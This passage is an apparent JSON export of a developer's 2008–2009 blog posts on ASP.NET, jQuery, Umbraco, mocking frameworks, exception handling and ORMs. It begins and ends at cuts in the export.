"https://www.aaron-powell.com/posts/2009-01-30-not-getting-dropdownlist-value-when-setting-it-via-javascript/", "date": "Fri, 30 Jan 2009 00:00:00 +0000", "tags": [ "asp.net", "ajax", "javascript", "jquery" ], "description": "", "content": "So today I had a problem which was doing my head in. I had a form which has a bunch of DropDownLists on it, some of which are disabled (depending on the radio button selection). Regardless of whether the DropDownList was available I needed to read the value (which was often set via JavaScript) back on the server.\nBut I noticed that the value I was setting via JavaScript wasn't making it way back to the server if I read the dropDownList.SelectedValue property.\nHmm I said to myself, I looked at the form, it's setting the value right. The \"selected\" attribute was on the right option tag, but the value still isn't on the server.\nIf I had set the value by clicking on it and selecting a value it was making it back.\nHmm...\nThen I realised, the difference between the two actions was the DropDownList wasn't enabled in one of them, and when it wasn't it was enabled the value wasn't making it back.\nShit, that's it! When a DropDownList isn't enabled .NET seems to disregard the submitted value when loading the ViewState!\nBut the solution is simple:\n$(document).ready(function() { $('#submitButton').click(function() { $('select').removeAttr('disabled'); }); }); jQuery makes it super easy to find all the drop down lists and then make them enabled before the form submits.\nHere's another example of how to do it if you're using client-side validation and you want to make sure it's passed:\n$(document).ready(function() { $('#submitButton').click(function() { if( Page_IsValid ) $('select').removeAttr('disabled'); }); }); Page_IsValid is the client variable updated with the result of the client side validation.\n", "id": "2009-01-30-not-getting-dropdownlist-value-when-setting-it-via-javascript" }, { "title": "Comment feeding and more dogfood", "url": "https://www.aaron-powell.com/posts/2009-01-29-comment-feeding-and-more-dogfood/", "date": "Thu, 29 Jan 2009 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": "Well I've been doing some more changes to my website (and not breaking it... much :P) and I've finally got round to adding a feature that Ruben was nagging for, a comment RSS feed.\nNow it's easier to stay up to date with the comments that are bouncing around posts (in particular like we saw on the recent post around extension methods.\nI also decided to dogfood an old post I did about client side templating, so to go with a new comment RSS I have updated the comment engine to use jTemplates, and I've also added Gravatar. Proof that I haven't been taking your email addresses just for sale to spam companies ;).\nMy blog has never looked so polished!\nAs any Umbraco developers are (or should be) aware Umbraco 4 ships this Friday, which is Saturday for us people in the future. I plan to be hot on the heals of the v4 release with v1 of the Umbraco Interaction Layer. I've been doing a lot of work with it and on it recently. There's been a number of bug fixes, but now it's in a stable condition with one bug which I'm still to fix (go on, generate a doc type with a child relationship to a doctype which has a name ending in \"y\", it gets a bit funny there!).\n", "id": "2009-01-29-comment-feeding-and-more-dogfood" }, { "title": "Are extensions really evil?", "url": "https://www.aaron-powell.com/posts/2009-01-25-are-extensions-really-evil/", "date": "Sun, 25 Jan 2009 00:00:00 +0000", "tags": [ "generic .net" ], "description": "", "content": "Ruben (of Umbraco fame) recently wrote a post entitled Extension Methods: Silent static slaves which was in response to a comment I'd left on a previous post about static classes and static method being evil.\nIf you haven't read Ruben post then I suggest you do before continue on with mine as a lot of what I'll be saying is in counter argument to him (including the comments).\nDone? Good, continue on!\nRuben has produced a demo which is great for illistrating his point, but is it an example of good design turning bad or just bad design from the start?\nThe first thing I want to look at is that his extension methods are on the interface and implementation class.\nThis is bad design to start with, but it's not just bad design if you're using extension methods, this could manifest itself as bad design if you did it as helper methods in a separate class, eg:\nclass Helpers {\npublic static int CalculateShoeCount(Animal animal) {\n//do processing\n}\npublic static int CalculateShoeCount(Monkey animal) {\n//do processing\n}\n}\nSo this would fall into the same trap if we don't re-cast Animal to Monkey before calling the helper.\nBut does this prove Ruben's initial point, that static's are just plain evil?\nWell no, design isn't possible without statics. If you try and design without statics you end up with nothing but instance memebers. If that's the case where do I find the current method int.TryParse, does this become 0.TryParse?\nRuben's demo is an example of bad design producing worse design. In good design the CalculateShoeCount would be a member of the Animal interface, particularly since the implementation changes per interface implementation type.\nSo how can we use extension methods to produce good design? Well first you really need to understand what an extension method is. As Ruben quite correctly pointed out an extension is just syntactic suger and extension methods should be treated as such. Developers need to understand that extension methods are only designed to provide functionality to a classes public instance members; they are stateless.\n(This is why I don't understand why so many people of Stack Overflow want extension properties added to the compiler, this is where people are missing the point of the extension concept)\nAnd if you're expecting a stateful nature from the extension methods then you've missed their goal.\nLets look at some good examples of using extension methods. Here's a fav of mine for Umbraco:\npublic static string Url(this Node node) {\nreturn umbraco.library.NiceUrl(node.Id);\n}\n(Hey look, a static calling a static ;)).\nOr how about this one:\npublic static IEnumerable<ListItem> SelectedItems(this ListControl ctrl) {\nreturn ctrl.Items.Cast<ListItem>().Where(item => item.Selected);\n}\nNow we're using an extension method with an extension method.\nBut both of these examples are using actual class implementations, not interfaces, does that make a difference?\nYes, and a big one. When you are putting extensions on an interface there needs to be no possibility of confusion about what the extensions are for. And if you are also providing an extension of an implementation of the class they need to be in separate namespaces. If they aren't, you will end up with what Ruben shows, misrepresentation of the methods abilities.\nIQueryable<T> is a perfect example of how to use extension methods on top of an interface. If you have a look at the construct of the interface there's actually no constructs within it! This means that \"all\" the functionality is provided by extension methods, allowing anyone to write their own extensions.\nIf I was to not include the namespace System.Linq I can then write my own query extensions, eg a Where that does return a bool, or negate operators which I don't want to support.\n \nSo in my opinion extension methdos are no more evil than anything else in programming; they can easily be abused and misused, but find something that it'd not possible to misuse to prove bad design.\n", "id": "2009-01-25-are-extensions-really-evil" }, { "title": "It's still cool to pick on Microsoft", "url": "https://www.aaron-powell.com/posts/2009-01-25-its-still-cool-to-pick-on-microsoft/", "date": "Sun, 25 Jan 2009 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": "This is going to deviate from my standard brain dribble a bit and be more of an opinion piece.\nSo recently the EU has announced it is going to fine Microsoft again because Internet Explorer comes with Windows and isn't that lovely. This comes on the back of the fine they slapped on them last year for anti-competative behavior.\nSo Microsoft is still popular punching bag, I'm sure most people remember when Microsoft was found and fined for monopolistic behavior.\nI'm like any other web developer and find that IE is a constant thorn in my side, particularly IE 6, but truth be told I don't mind IE 7 as a browser. I use it primarily at work (FF is way to slow for quick load and I just can't get excited about Chrome), and I don't have any problems with it. Sure the web dev tools are well behind Firebug, but the IE 8 tools really do look sweet, a complete Firebug rip-off, but every browser is doing that these days.\nSo if Microsoft is being sued because they are bundling a browser with their operation system (I smell Opera behind the push from the EU) it has me wondering about another company and their practices. That company would be Apple and here's a fact, they too supple a browser with their OS, Safari.\nLike IE on Windows, Safari on OS X is lightning fast, compared to Firefox and Opera; like IE on Windows it's well embeded into the the OS; but unlike IE on Windows it's heavily tied to the browser version.\nDid you know you can't run Safari 3 on OS X 10.4, nor can you run Safari 2 on OS X 10.5 (which I found out the hard way).\nWhat about the iPhone, the cool kid on the block, and a kid who's cornering the 3G phone market, Apple's decided to allow third party browsers through the AppStore, (if you believe the rumors) but this is after the argument which was produced when a leaked Opera tried to be submitted.\nAnd I'm not even going to look at the iPhone SDK EULA in regards to writing software (small hit, check out whether or not you can have a JIT compiler ;)).\nCan you see the point I'm making, interesting isn't it, Apple is starting to look a lot like Microsoft did 15 years ago.\nSure, Apple doesn't have the market share that Microsoft commands, but it really is facinating just how much bundled software comes on a new Mac:\niTunes (for Music and iPod syncing) iCal (calendard software) Address Book (contact management) Mail (POP, Exchange, etc) Quicktime (Video) Preview (for PDF) And the list really does go on (but does include trials of iWork and Microsoft Office for Mac).\nWith Apples market share growing, Microsoft not really concerned about people installing Windows on a Mac (despite what the Apple marketing team wants you to believe), do you think that they should be worred? Are Apple going to become the next company which it is cool to pick on?\n", "id": "2009-01-25-its-still-cool-to-pick-on-microsoft" }, { "title": "Twitterific", "url": "https://www.aaron-powell.com/posts/2009-01-25-twitterific/", "date": "Sun, 25 Jan 2009 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": "Well I'm a whore in all it's forms now (well, actually it's been that way for a while), I'm a twitter-er.\nYou'll find my occational tweets here.\nI don't really find the appeal of twitter, I particularly don't understand the appeal of using it for something other than an outdated form of IRC.\nBut oh well, if you want to, there I am.\n", "id": "2009-01-25-twitterific" }, { "title": "Apologies to my loyal fans", "url": "https://www.aaron-powell.com/posts/2009-01-21-apologies-to-my-loyal-fans/", "date": "Wed, 21 Jan 2009 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": "Just a quick apology to anyone who has tried to submit a comment to my blog since I did the site refresh.\nPart of my new code base around the comment submission was not working so I have not received any comment submissions since then.\nSo no, I haven't just been ignoring you ;)\nIt also means I found 2 new bugs in the UIL which I need to address before I can put v1 out!\nPlease feel free to resubmit your comments as I do enjoy reading them. Also, if you don't have a \"thank you\" message show after attempting to submit a comment it failed. If you're using Firebug you'll be able to see the web service response and I would like to see it so I can address the problem.\nYou can drop me an email on:\nme (at) aaron hyphen powell (dot) com\n", "id": "2009-01-21-apologies-to-my-loyal-fans" }, { "title": "Fun with a Client Event Pool and modal popups", "url": "https://www.aaron-powell.com/posts/2009-01-17-fun-with-a-client-event-pool-and-modal-popups/", "date": "Sat, 17 Jan 2009 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": "I read an article last year about implementing a Client Event Pool and I really liked the concept. Joel shows a very good way to use it but I've been doing my best to find a logical use for it myself.\nAnyone not familiar with the concept of a Client Event Pool it's covered in Joel's post, but the short version is that a Client Event Pool is a browser-level event handler which is designed to allow events to be easily passed between unlinked components.\nOne component can raise an event which can be chosen to be handled by any other. Inversly events can be listened for even if the component isn't on the page or the event isn't used.\nThis isn't really a new concept, you can achieve it (to a certain extent) with standard ASP.NET, with the OnClient<EventName> which is on a lot of the standard ASP.NET controls.\nAnd in this article I'm going to look at how to integrate a Client Event Pool with the ASP.NET AJAX Control Toolkit's Modal Popup.\nNow, don't get me wrong, this isn't the only way to add the events to a modal popup control, there are a lot of event handlers which can be added without a Client Event Pool.\nThis all came about when I was tasked with integrating a login, forgotten password and change password component. Each were their own modal popups and each were separate .NET UserControls. I wasn't involved with developing any of them, and I didn't want to really do much to modify any of them too much and introduce more bugs in the system by screwing around with stuff I'm not familiar with.\nBecause they are all separate I didn't have a real way to pass the ID of the control that was to make the popup appear. Oh, and to make thing more complicated there were 2 links for each popup, sadly the Modal Popup doesn't support multiple controls to do the poping-up (or as far as I'm aware...)\nI also didn't want each of the popups to overlay each other, it doesn't really look that good (as I'll show shortly), so I needed a way to hide the master popup when the child was shown, and then when the child was hidden I want the master to reappear.\nSo I'm doing 3 basic controls for my example, a Login control:\na Forgotten Password control:\na Registration control:\nAnd add a dash of CSS and you get a lovely little popup:\n(Ok, so my design skills aren't great!)\nSo now it's time to tie up the master control with the child controls. To do this I'm going to have 2 events raised from the child controls, one for when the popup is shown and one for when it is hidden.\nI'm also going to have an event which can be raised elsewhere on each child control which will initiate the showing of the popup (you could add one for the hiding, but I'm using the inbuilt hiding from the CancelControlID property of the modal popup).\nFor each they will look as follows:\nLets have a look at how they work, first off I locate the the Sys.Component instance of the ModalPopup control.\nThere are showing and hiding events fired off from the ModalPopup, so I'm going to add a handler, the handler though will just be a stub which in-turn raises an event within our Client Event Pool. I've given them names which will indicate what they are used for.\nLastly I'm going to add an event handler so anyone can raise an event which will show the popup.\nNow lets have a look in the Login control:\nThe first 2 lines of this is adding event handlers to the links on the control. All they do is tell the Client Event Pool to raise an event, an event which I previously set up to be consumed by the child controls.\nNext we set up the Client Event Pool to listen for the hide and show events from our child controls.\nIt listens for the events to be raised and when they are it'll either hide or show the modal on the current page.\nAdmittedly I've gone a little bit overboard with my events between the two child controls. Each could just raise events like hideParent and showParent, and then I would only need 2 handlers against the Client Event Pool, but to illistrate my point I've gone the verbos method.\nNow I've gone for having the popups showing like this:\nTo this:\nAdmittedly static images can't really show how it works, but it's much nicer to not overlay popups, and ability to having popups automatically hiding and showing the loss-of-focus ones is a really sweet idea.\nI'll admit that it's possible to do this without the need for a Client Event Pool, you can expose all the appropriate properties on the child controls which then can be set appropriately within it's parent, but think of it a step further, if you wanted a link on the Forgot Password to the Registration page. Because they aren't really aware of each other it is very difficult to achieve (but not impossible). Your UserControl can also expose wrappers to the Showing and Hiding client events on the modal popup, but it still has the same problem as mentioned previously.\nAnd there we have it, a nice little example of how to use a Client Event Pool to make it easier to link previously unlinked components in a soft way.\nThe source code for this article can be found here.\n", "id": "2009-01-17-fun-with-a-client-event-pool-and-modal-popups" }, { "title": "Programmatically moving Umbraco nodes", "url": "https://www.aaron-powell.com/posts/2009-01-15-programmatically-moving-umbraco-nodes/", "date": "Thu, 15 Jan 2009 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "The other month Ruben did a post on using the new Umbraco event model and today I had to solve a problem which it seemed like it would be the best way.\nI needed to have a document, when published, moved into a new folder (as we're using Umbraco to store some data used for some non-browsable data). This can be achieved with the old IActionHandler.Execute method, but it was a little problematic, you needed to have some way to check if it was running because you moved and republished, or the initial publish.\nLuckily, the Umbraco v4 event model makes this really nice and easy. Well, slightly easier, there's a few things that are still a bit of a pain, but it's not a problem with Umbraco, more a by-design limitation.\nSo lets get into some code.\npublic class ActionHandler : ApplicationBase { public ActionHandler(){ Document.BeforePublish += new EventHandler(Document_BeforePublish); } protected void Document_BeforePublish(Document sender, PublishedEventArgs e){ try { MyDocType dt = new MyDocType(sender); if(dt.SomeField == “stillToMove”) { e.Cancel = true; dt.ParentId = 1234; dt.SomeField = “it’s moved!"; dt.Save(true); }\n} <span class="keyword">catch</span> (<span class="const">DocTypeMissMatchException</span>) { } } } So I've used the UIL to generate a class representation of my docType (aptly named MyDocType :P) and from that I'm having to check a field on the document. This could be anything from a standard field to a the parent ID to the published state.\nThe really nice part about using the event handler I can stop the current publish action. This will improve performance and database hits.\nYou can do this without the UIL, but because of some of the built in features of the UIL it can be easily used to detect the correct docType. There's no need for magic numbers (and I'm sure a better way to pass the new parent ID can be thought up!).\nSo all in all I think that the new event model can have some really powerful aspects to it, it provides much more flexibility and event variety over IActionHandler.Execcute.\n", "id": "2009-01-15-programmatically-moving-umbraco-nodes" }, { "title": "Site refresh, now with more dog food", "url": "https://www.aaron-powell.com/posts/2009-01-12-site-refresh-now-with-more-dog-food/", "date": "Mon, 12 Jan 2009 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "Any astute visitors to my website will have noticed a few changes today. And for those who didn't I don't really blame you, they aren't that obvious.\nFirst off, I've upgraded my site to be running Umbraco 4 RC 1. It's been out for a while so I thought it was time I joined the hip crowd and started running it. I have been using it since Beta 2 on another site, but now I have my own running it as well.\nSecondly I have refreshed the home page, no longer does it have a pointless blurb, now it shows the latest blog post.\nThirdly I have removed most of the AJAX loading from the blog component. I wrote it originally as a bit of a trial-and-error to see if I could do it, but it was really quite pointless, and ultimetly a real bitch to deal with. Plus it rendered the site useless when you had JavaScript turned off!\nI've kept it for the comment submission because I was simply too lazy to re-write the whole thing last weekend, as odd as it may seem I do leave my computer sometimes!\nAdditionally I have changed the URLs to actually work with the standard Umbraco URLs. Now the post perm-links are the URL's generated from Umbraco, and you can navigate to months via the folder URL. Categories still work off a query-string parameter, but getting around that is more effort than I could be bothered with!\nForthly I am finally Dog Fooding with the UIL on this site. I wrote the blog engine with custom classes to represent my doc types originally, but now I have started using the UIL to provide it all.\nI'm really happy at the way it did work as well and am preparing for a new release of the UIL, but I have also found some limitations with it which I will be addressing when looking at the v-Next of the UIL.\nSo I'm quite happy with the way it came together, even if it did take a hell of a lot longer to do this refresh than I had originally hoped (good thing the better half was busy for most of the weekend so I'm not in too much trouble!).\n", "id": "2009-01-12-site-refresh-now-with-more-dog-food" }, { "title": "Dude, where's my Canvas?", "url": "https://www.aaron-powell.com/posts/2009-01-05-dude-wheres-my-canvas/", "date": "Mon, 05 Jan 2009 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": " Although there's been big praise for the Umbraco 4 RC release, and after I upgraded a site I'm working on to it, I had high hopes. One of the things I wanted to really play with is Canvas (formerly Live Edit). But it wasn't to be, when ever I went to load up Canvas there was nothing happening. Well, I had a few points which I could see I needed to click on, but clicking them did nothing.\nNor was I able to see the Canvas Toolbar which is always shown in the demos. Hmm, now that's not right... So I whipped out the source for Umbraco, and got debugging. But oddly enough none of the break points within the associated Umbraco Canvas controls were being hit. I had a UmbracoContext, and it was telling me Canvas was enabled.  And I kept digging, and then I noticed the folly of my mistake. I wasn't referencing the base Umbraco master page! There are two options: Set your master page to have a master of /umbraco/default.master and wrap your entire master page in a ContentPlaceholder with the ContentPlaceholderID of ContentPlaceHolderDefault Inherit your master page from umbraco.presentation.masterpages._default instead of System.Web.UI.MasterPage (this is my prefered option) There's still another bug which I am yet to find the cause of, when you have a macro which programmatically adds a file to the pages ScriptManager it doesn't work at all, the added file doesn't get added...\nI'm still digging on that one... Oh, and I noticed that the ItemEditor class inherits UpdatePanel, good thing we don't expect peak performance from Canvas :P ", "id": "2009-01-05-dude-wheres-my-canvas" }, { "title": "A month with TypeMock", "url": "https://www.aaron-powell.com/posts/2008-12-24-a-month-with-typemock/", "date": "Wed, 24 Dec 2008 00:00:00 +0000", "tags": [ "unit testing" ], "description": "", "content": " A month ago I did a post about the TypeMock mocking framework and the nice people at TypeMock were kind enough to give me a 1 year license for their software. Although I haven't really played with it as much as I hoped/ would have liked I have done a bit with it and though I'd share some thoughts. To have a bit of a base line I was doing my playing with both Typemock and RhinoMocks, just to have an example against a good free mocking framework. Where Typemock rocks The most exciting aspect of Typemock for me is that I can mock anything (well, nearly anything, you can't mock things from within mscorlib), and I mean anything. With the SharePoint aspect TypeMock really advertises that you can mock the SharePoint libraries as they are, meaning that you don't need source code access or anything. What do I mean by this? Well take RhinoMocks for example. RhinoMocks is built on top of the Castle projects DynamicProxy2 component. This means that if you're wanting to set up expected returns your methods are required to be virtual. This can be a problem if you're mocking an external framework (ie - SharePoint). But because TypeMock doesn't used DynamicProxy2 you don't have this limitation.  So with the demos which I was watching and reading with TypeMock on SharePoint it got me thinking, could I mock Umbraco? And you know what, I can! This is really exciting, when I was developing the Umbraco Interaction Layer I really wanted it to be unit tested, but due to limitations within Umbraco this mean I wasn't able to use something like RhinoMocks, because I needed to setup expected returns on method calls which weren't virtual (although I could download the source and modify that myself it defeats the concept of supporting a standard Umbraco release). So I got playing with TypeMock and low and behold I was able to set up some basic mocks to make fake data types! The code is currently POC-level and won't be going into the CodePlex project (I feel it is unfair that I put a licensed product up when the UIL is a free product), but still it is a very interesting concept and something I plan to look deeper into. I also have found that TypeMock can be a whole lot easier to set up mock returns, because the parameters are completely ignored when making a method call you can be a bit more careless in your mock setup.  Lastly TypeMocks ability to mock the construction of objects without public constructors is really nifty. Again this has great advantages when mocking with external libraries like SharePoint and Umbraco. Where TypeMock doesn't rock Although I stated that I like that I don't have to really worry about the parameters being passed into the method this is also a bit of a drawback. If you had a method that you want different returns depending on the method input (say, something doing a calculation) this is something that I so far haven't been able to work out how to achieve. By contrast this can be done in RhinoMocks as you need to provide a valid method parameter that you will then use when calling for the mock. Is it worth the money? This is a difficult question to answer, primarily because I haven't played with TypeMock enough. I really think that it's more of a case of \"depending what you're doing\". I can see that TypeMock is really great if you're wanthing to mock the results from an external library like SharePoint, Umbraco (or I'm sure even SiteCore ;). Also I see TypeMock is great to add mocking after the fact to a project. You may be will into development, many of the project API's are already set up, ready for use but you want to now go down the TDD path (it's never too late to start!). In this case going back and redoing all methods to be virtual is not really viable. But TypeMock's non-reliance on virtual methods for mock results does mean you can achieve TDD without major refactoring. ", "id": "2008-12-24-a-month-with-typemock" }, { "title": "PDB != Product Deployable Bits", "url": "https://www.aaron-powell.com/posts/2008-08-22-pdb-not-equal-product-deployable-bits/", "date": "Mon, 22 Dec 2008 00:00:00 +0000", "tags": [ "generic .net", "random" ], "description": "", "content": " Something else I see all too often at work (although not as often as not understanding the difference between client and server) is the existance of the PDB file on a production web server. PDB files are automatically created from Visual Studio through the .NET compilers, so why don't they belong on the production server? First we need to look at what is the PDB file? The PDB, or program database is a file generated from the .NET compilers which contains debugging information about the generated assembly or executable. I'm sure you've seen when you run code on your local machine and receive an exception and then a stack trace which pin-points the line of code which the error was thrown from.\nBut when you run that same error on a production server all your stack trace states is the method. And that's the vision of the PDB. The PDB maintains the information about where it was compiled. So now that we know what is a PDB, why shouldn't it be on a production server? You could be mistaken for thinking that the PDB is a good idea to have on a production system. After all, when ever something does go wrong on a production system you want to get all the information you can, as quickly as you can. The user who generated the error wont often be able to give you all the information you require, and your error-producing method could be very long with several locations where the error may have come from (which kind of leads back to my previous post on catching System.Exception). But to produce the additional information comes at a significant cost. Have you ever attached a debugger in Visual Studio onto a process? Next time you do watch the symbol loading list, or try doing it just after restarting IIS and notice the time it takes for a request just to happen. Then compare that to the first request after restarting an IIS without PDB files. This is why PDB's don't belong on, performance. If every time a page is requested it has to load the information into memory about all the .NET components on the page that's a lot of overhead. And for the most part (or so you'd hope) the information isn't required, it's only required for the worst case scenario. But you shouldn't delete your production PDBs! The above statement is very true, if we're deploying into a production environment we need some way to reproduce the errors that are produced there and receive the complete debugging information. This means that when deployment is done the PDB's should always be backed up, stored and backup again!\nThe PDB is a window into the soul of the code. Without it there is no way to get the debugging information back.\nThis is where the Microsoft Symbol Servers come into play but that's a story for another time ;) ", "id": "2008-08-22-pdb-not-equal-product-deployable-bits" }, { "title": "Should you catch System.Exception?", "url": "https://www.aaron-powell.com/posts/2008-12-18-should-you-catch-system-exception/", "date": "Thu, 18 Dec 2008 00:00:00 +0000", "tags": [ "generic .net" ], "description": "", "content": " System.Exception is a funny class, it's a class that on its own isn't really that practical. In the talk that Brian Abrams talk on Framework Design Guidelines from PDC 2008 (a really interesting video) he mentions that if they could do it over again they would make System.Exception an abstract class. And I completely agree. I hate nothing more than seeing code like this: throw new Exception(\"Something bad happened!\"); This line of code does not provide any insight into what has happened to produce the exception (ok, sure it's out of context, but I'm sure you've seen that used in context somewhere). It really comes about from a lack of understanding of the different exception types, and when they are appropriately used. This then leads into the question I posed with this post, should you actually catch System.Exception?\nI'm of the belief that you shouldn't catch this exception. All too often in exception handling I see code like the following: try{ // do something } catch (Exception ex) { // do some exception handling } This exception handling isn't really that useful, from here all I have done is catch anything that's gone wrong, I have no opportunity to do anything unique with the different exception types nor could I appropriately handle an exception being thrown. Take email sending, web apps frequently have email sending in them and obviously you'll need have some kind of error handling. The most likely exception to be thrown is the SmtpException so when catching that you want to inform the user that there was a problem sending their email. But there are other possible exceptions like null if you didn't set all the data appropriately. But that you may want a different message to the users. If all you're catching is Exception then how do you provide a different message? But should that mean that you don't catch System.Exception? I say yes, you don't catch it, if you're appropriately catching known possible exceptions you shouldn't need System.Exception, that should be handled by the application-wide exception handling (within the Global.asax). Appropriate exception handling means actually understanding just what could go wrong and handling those senarios, not just catching everything and not really understanding what could go wrong. Moral of the story, the more you understand about what could go wrong within the application with make your life easier in the long run. ", "id": "2008-12-18-should-you-catch-system-exception" }, { "title": "I'm now on Feedburner", "url": "https://www.aaron-powell.com/posts/2008-12-15-im-now-on-feedburner/", "date": "Mon, 15 Dec 2008 00:00:00 +0000", "tags": [ "random" ], "description": "", "content": " Well I've moved a step closer to having my entire life monitored by Google, I now have my feed monitored via Feedburner. You can find me here: http://feeds.feedburner.com/linqToAaronPowell. Anyone who is nice enough to actually subscribe to my RSS could you update to my FB link please :)\n", "id": "2008-12-15-im-now-on-feedburner" }, { "title": "What's in a name?", "url": "https://www.aaron-powell.com/posts/2008-12-15-whats-in-a-name/", "date": "Mon, 15 Dec 2008 00:00:00 +0000", "tags": [ "random", "rant" ], "description": "", "content": " Something that really annoys me is that when people don't use the correct name of a product, and by not using the name of the product completely miss what the product is for. I think that certain people do do it just to stire me up, but for example a product I do a lot of work with is RedDot CMS. But RedDot produce another product, RedDot LiveServer which is completely different in what it does.\nRedDot CMS is just a content management system, and to be honest it's one of the truest examples of a content management system. Most common CMS's really blur the line between content management and application serving. Application serving is what RedDot LiveServer is about. I'm not a fan RedDot LiveServer (for reasons which I wont go into here) but RedDot CMS I believe is a good CMS product, if you're after a CMS.\nBut I'm digressing. Another example, one which I see even more often is SharePoint. I can't count the number of times I've heard \"They want a site in SharePoint\" or \"Their site is built in SharePoint\".\nGreat, fantastic, what can you tell about my car if I tell you it's a Ford? SharePoint is a technology base, the SharePoint family is broken into two major components, Windows SharePoint Services (v3 is current) and Microsoft Office SharePoint Server 2007.\nAnd then within their families there are a number of different versions, depending on what is provided in the project. Similarly when I started development on the Umbraco Interaction Layer I spent quite a while thinking about what would be the name of the project. I eventually decided on UIL because of it conveys what the project is all about, providing a layer for better integration/ interaction with the Umbraco API.\nSure it has also been nick-named LINQ to Umbraco, but really the concept of a LINQ-like API for Umbraco is actually a very small part of what the UIL is all about. So next time someone comes and asked for info on how to build a site in SharePoint, or use any other ambigiously named product, just look blankly at them and ask them what said technology is! ", "id": "2008-12-15-whats-in-a-name" }, { "title": "Are ORM's bad?", "url": "https://www.aaron-powell.com/posts/2008-12-14-are-orms-bad/", "date": "Sun, 14 Dec 2008 00:00:00 +0000", "tags": [ "random", "linq-to-sql" ], "description": "", "content": " So an interesting post come up on Stack Overflow (which, if you're not into you really should be) which was on the idea of ORM's and whether why are they becoming popular. I'm a big fan of ORM's and I find that the responses in the topic are very interesting. By and large the responses from people are for ORM's, but this negative response got me thinking. The author makes a very valid point that with an ORM change release for minor change (I use the term loosly as there's never such a thing as a minor change... EVER) result in a larger deployment than you'd likely see in a non-ORM system. On a recent website I worked on we had several instances where we had to do entire DAL releases (which the ORM is obviously built into) just for minor but system-critical changes.\nThey may have only been a handful of code lines that were updated but to get the changes released it required a lot more work. You needed to get an environment into a production-mirror state, local the appropriate label in source control, branch, make change, test, release. Admittedly the majority of these steps are required each time but with a sproc change you ultimately have less dependancies, so the chance of a major fuck up is drasticly reduced. That said, I am a huge fan of ORM's, I'm a really big fan of LINQ to SQL and I think it's possibility for use within a DAL is high (as implied here). I've used several different ORM's in my time, with different levels of code generation. I like LINQ to SQL as it doesn't actually add anything to the SQL server (which also makes unit testing a snap!). We had an in-house tool that we used for quite a number of years which generated .NET classes from your tables and a series of sprocs to handle most CRUD operations. It too was good, but it ultimately lead to what I believe the fundimental mistake that happens with ORM's - the spread of business logic. Often with projects you'll have people who are really good at SQL, and you'll have people who are really good at .NET. And more often than not you'll end up with them coding their business logic into their preferred language.\nSo you end up with some of the business logic stored in the database and the rest stored in code files.\nThis then poses a maintenance nightmare. Depending on your security practices it may not be possible to debug the sprocs from VS, or the developer maintaining may not understand .NET as well as the original author. I'm someone who's not great on SQL, I can get myself into and out of most trouble on a standard project, but when it comes really complex components I'd much rather write a few delegates and have my ORM handle it than try and achieve it in SQL.\nAnd any half-decent ORM should be expected to translate the code-based queries into the underlying language of choice. ORM's are here to stay, there's no doubt about that and i believe they offer a great advantages in development time and provide a good medium for proper logic abstraction within a project. ", "id": "2008-12-14-are-orms-bad" }, { "title": "Microsoft Ajax <3 jQuery", "url": "https://www.aaron-powell.com/posts/2008-12-13-microsoft-ajax-hearts-jquery/", "date": "Sat, 13 Dec 2008 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": " All ASP.NET developers should know by now that Microsoft is officiall supporting jQuery as part of Visual Studio 2008 (and beyond). Well I've finally got to doing a project where I'm doing some very heavy AJAX implementations, and since it's a .NET build MS AJAX is already part of the loaded scripts, so I'm using jQuery in a supplimentary manner. And loving it! The jQuery vs-doc file makes life a so much easier, full intellisense support with code documentation. Writing ASP.NET client controls that use both MS AJAX and jQuery is a snap too. When using Sys.UI.Control it's very simple to get a jQuery reference for the current control (psst - var j = $('#' + this.get_element().id)). And the future is looking even more exciting - http://weblogs.asp.net/bleroy/archive/2008/12/09/microsoft-ajax-client-templates-and-declarative-jquery.aspx. Client side templating, ASP.NET back-end power, the future of AJAX development with ASP.NET is looking very exciting! ", "id": "2008-12-13-microsoft-ajax-hearts-jquery" }, { "title": "Don't you worry about Planet Express, let me worry about blank", "url": "https://www.aaron-powell.com/posts/2008-12-11-dont-you-worry-about-planet-express-let-me-worry-about-blank/", "date": "Thu, 11 Dec 2008 00:00:00 +0000", "tags": [ "umbraco", "Umbraco.InteractionLayer", "linq", "asp.net" ], "description": "", "content": " Well avid reader I'm sure you are able to work out what the title is in reference to (bonus points if you got the episode right). Well there is a bit of a reason for it, but it's really just a show of how massively nerdy a life I lead. Since I've started developing the UIL I've been asked a few times what is the point of it. Most obvious one was from Warren Buckley when I released Beta 1. So just what is the UIL and why should you use it? First, some background To really understand the point behind the UIL you really need to look at why I started it to begin with. Other than the shear thrill of the challange I did actually have a valid reason (well, one which is valid enough in my own mind).\nAnyone who has done a lot of coding against the Umbraco API will be familiar with it's limitations, and those who haven't, well think about this.\nYour standard DocType has around half a dozen properties on it and these properties can have all kinds of use, depending on the purpose of the DocType. A lot of sites I've worked on have had a \"data\" tree of some sort. A content tree in Umbraco which contains items which are never navigateable to, items such as: News Form field data Galleries etc Programming aginst these using the standard Umbraco API isn't a problem when you're looking for a basic key/ value pairing between the ID and Text properties of the DocType, but what if you've got additional properties you want to access via code? Sure you have a doc.getProperty(string) method, but what does it return? It returns a property, which you can get the value from in the type of System.Object. So then you have to cast it into the actual type, but low-and-behold you may have DBNull.Value in there because no data has been entered in the system! So you write a check around it, you maybe write a generic checking method so you can reuse it in multiple places, and so on. I did this, many times (you'll actually seen an early implementation in my post Extending Umbraco Members) and I figured there had to be a better way.   Additionally I always had the goal of writing LINQ to Umbraco. Anyone who's read most of my posts (or has the pleasure *sic* of working with me) will know I'm very passionate about LINQ and what it can provide. Last year I had a chance to meet Niels and this was around the VS 2008 release, LINQ was a real buzz word and I chatted to him with the concept of a LINQ to Umbraco, something he seemed very fond of. And although it's very basic in its current incarnation (due to API restrictions) I'm quite happy that there is now a LINQ to Umbraco implementation available, and that I'm part of it. How can the UIL help your (Umbraco) life? So now that I've given some background about why I wanted to produce the UIL, how can it help you? It's all well and good for me to write something which will suite my needs perfectly but can it actually be usable for anyone else? The goal of the UIL is to act as a bridge between developers and the Umbraco API. The UIL is very much a developer tool, if you're not planing on writing and 